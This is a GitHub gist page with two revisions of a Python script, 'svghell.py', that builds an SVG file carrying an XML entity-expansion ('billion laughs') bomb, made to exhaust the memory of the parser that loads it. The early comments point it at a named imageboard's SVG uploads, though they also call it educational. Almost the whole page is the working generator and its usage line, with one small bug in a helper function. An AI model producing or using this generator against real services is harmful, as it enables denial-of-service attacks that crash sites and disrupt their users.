Last active
April 11, 2022 23:45
-
-
Save majestrate/84f8edf2a257c6fa5545 to your computer and use it in GitHub Desktop.
Revisions
-
majestrate revised this gist
Apr 11, 2022 . 1 changed file with 6 additions and 7 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,11 +1,9 @@ #!/usr/bin/env python3 # svg hell -- xml bomb generator for svg # # stop using SVGs # # usage: python3 svghell.py > evil.svg import random import string @@ -38,7 +36,7 @@ class SVGHell: svg xml bomb generator """ def __init__(self, num=10, base_str='bomb', description=None): self.num = num self.base_str = base_str if description is None: @@ -68,4 +66,5 @@ def generate(self): if __name__ == '__main__': svg = SVGHell() print(svg.generate()) -
Apr 8, 2015 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,71 @@ # # svg hell -- xml bomb generator for svg # # for educational use # please don't allow svg on 8ch.net # # usage: python svghell.py > evil.svg # import random import string class appendstr: """ character appending string """ def __init__(self, v='\n'): self.s = '' self.v = v def __add__(self, v): self.s = self.s + v + self.v return self def __str__(self): return self.s randint = lambda : random.randint(1, 1000) def rand_str(strlen): ret = '' for n in range(strlen): ret += random.choice(string.ascii_letters) class SVGHell: """ svg xml bomb generator """ def __init__(self, num, base_str='bomb', description=None): self.num = num self.base_str = base_str if description is None: description = rand_str(randint()) self.description = description def generate(self): """ generate an svg that explodes when loading """ data = appendstr() data += '<?xml version="1.0" standalone="no"?>' data += '<!DOCTYPE svg [' data += '<!ENTITY {}0 "{}">'.format(self.base_str, self.base_str) for n in range(1, self.num + 1): data += '<!ENTITY {}{} "{}">'.format(self.base_str, n, ('&{}{};'.format(self.base_str, n-1)) * (self.num + 1)) data += ']>' data += '<svg width="{}cm" height="{}cm" viewBox="0 0 {} {}" version="1.1"'.format(randint(), randint(), randint(), randint()) data += 'xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">' data += '<desc>{}</desc>'.format(self.description) for _ in range(self.num): data += '<text x="{}" y="{}" d="&{}{};">'.format(randint(), randint(), self.base_str, self.num) data += '</text>' data += '</svg>' return str(data) if __name__ == '__main__': print ( SVGHell(10).generate() )